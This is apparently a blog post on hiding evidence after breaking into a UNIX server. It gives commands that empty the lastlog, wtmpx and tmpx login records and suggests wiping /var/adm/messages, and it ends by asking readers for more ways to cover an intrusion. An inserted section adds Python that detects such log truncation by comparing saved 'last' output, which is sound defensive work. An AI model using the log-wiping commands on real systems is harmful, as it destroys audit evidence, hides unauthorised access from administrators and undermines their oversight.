Cover Your Tracks After Hacking A UNIX Box

In the Monitoring User Login post, the commands and files involved in tracking user activity were discussed.

Here are some ways of covering your fingerprints on a server using the files that monitor user logins.

We want to erase any trace that would show that we were inside the box. To do so, we’ll just:

cat /dev/null > <file>

Lastlog file

Clear out the lastlog file if you’re using an existing user on the box. The lastlog file shows when and from where a particular user last logged in.

login: razile
Password:

Last login: Fri Oct 21 21:50:02 2007 from 210.2.9.1
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
razile@unix-box %

Erase that if you don’t want the admin to see where you last logged in from (IP, hostname, time, etc.).

cat /dev/null > /var/adm/lastlogin

After clearing the lastlog file, compare the first login with the second one:

(first login)

Last login: Thu Nov  1 21:33:41 2007 from 210.23.109.1
Sun Microsystems Inc.   SunOS 5.9       Generic May 2002
user@server->

(after deletion)

Sun Microsystems Inc.   SunOS 5.9       Generic May 2002
bash: unalias: `e': not an alias
user@server->

wtmpx/tmpx files

If you want to check which users have logged in to a Unix box, type ‘last’:

UnixBox# last | more
root      pts/21    101.221.224.61   Sat Nov  3 11:38   still logged in
sitescp   pts/20    19.168.128.132   Sat Nov  3 07:00   still logged in
root      pts/23    101.221.224.51   Sat Nov  3 05:05   still logged in
root      pts/22    101.221.224.51   Sat Nov  3 05:05   still logged in
paladel   pts/22    14.122.4.99      Fri Nov  2 14:33 - 15:32  (00:59)
boy1      pts/26    14.122.4.67      Fri Nov  2 13:22 - 14:50  (01:28)
boy2      pts/26    14.122.4.67      Fri Nov  2 13:20 - 13:22  (00:02)

You’ll see the user who was logged in, the terminal used, the IP he came from, and the date and duration of his activity on the server.

That is a lot of information, so to cover your tracks, delete or zero out the files that store it:

cat /dev/null > /var/adm/wtmpx
cat /dev/null > /var/adm/tmpx

After doing so, you’ll get this when running ‘last’:

# cat /dev/null > /var/adm/wtmpx
# last | more

wtmp begins Sun Nov  4 00:41
#

You could also zero out the /var/adm/messages if you’re really paranoid.

Of course, doing this is like shouting and telling the whole universe that you were there: the accounting files are suddenly empty, and ‘last’ now reports that wtmp begins at the exact minute you wiped it.
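From the administrator’s side, that wipe is exactly what a periodic check can catch. As an added example that is not part of the original post, the Python below diffs a previously saved copy of ‘last’ output against the current one and flags both the vanished login records and a ‘wtmp begins’ marker that jumped forward in time. The two listings are constructed samples modelled on the page’s output, and the year is an assumption the caller supplies because ‘last’ does not print it.

```python
import re
from datetime import datetime

# Constructed samples of `last` output modelled on the page's listing (hosts are
# made up): a snapshot saved earlier, and the output after wtmpx was zeroed.
BASELINE_LAST = """\
root        pts/21       101.221.224.61    Sat Nov  3 11:38   still logged in
paladel     pts/22       14.122.4.99       Fri Nov  2 14:33 - 15:32  (00:59)
boy1        pts/26       14.122.4.67       Fri Nov  2 13:22 - 14:50  (01:28)

wtmp begins Mon Oct  1 00:00
"""
CURRENT_LAST = """\
root        pts/21       101.221.224.61    Sun Nov  4 09:12   still logged in

wtmp begins Sun Nov  4 00:41
"""

STAMP = r"(\w{3} \w{3}\s+\d{1,2} \d\d:\d\d)"
LOGIN_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+" + STAMP)
BEGINS_RE = re.compile(r"^wtmp begins " + STAMP)

def _ts(stamp, year):
    # `last` prints no year, so the caller supplies it (year wrap is out of scope).
    return datetime.strptime(f"{stamp} {year}", "%a %b %d %H:%M %Y")

def parse_last(text, year):
    """Return (set of (user, tty, host, login_time), 'wtmp begins' time)."""
    records, begins = set(), None
    for line in text.splitlines():
        if m := BEGINS_RE.match(line):
            begins = _ts(m.group(1), year)
        elif m := LOGIN_RE.match(line):
            user, tty, host, stamp = m.groups()
            records.add((user, tty, host, _ts(stamp, year)))
    return records, begins

def detect_truncation(baseline_text, current_text, year):
    """Diff a saved `last` snapshot against the live output; return
    (findings, records that vanished from the log, oldest first)."""
    base_recs, base_begins = parse_last(baseline_text, year)
    cur_recs, cur_begins = parse_last(current_text, year)
    missing = sorted(base_recs - cur_recs, key=lambda r: r[3])
    findings = []
    if missing:
        findings.append(f"{len(missing)} login record(s) in the snapshot are gone")
    if base_begins and cur_begins and cur_begins > base_begins:
        findings.append(f"'wtmp begins' moved forward from {base_begins:%b %d %H:%M} to {cur_begins:%b %d %H:%M}")
    return findings, missing
```

A record whose session was still open in the snapshot keeps the same login time once it closes, so it is not reported as missing; only records that disappear entirely, or a log start that moves later, raise a finding.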

These are just a few ways to cover your tracks… Do you have any additions? Or any tips on covering an intrusion without anyone knowing you were there?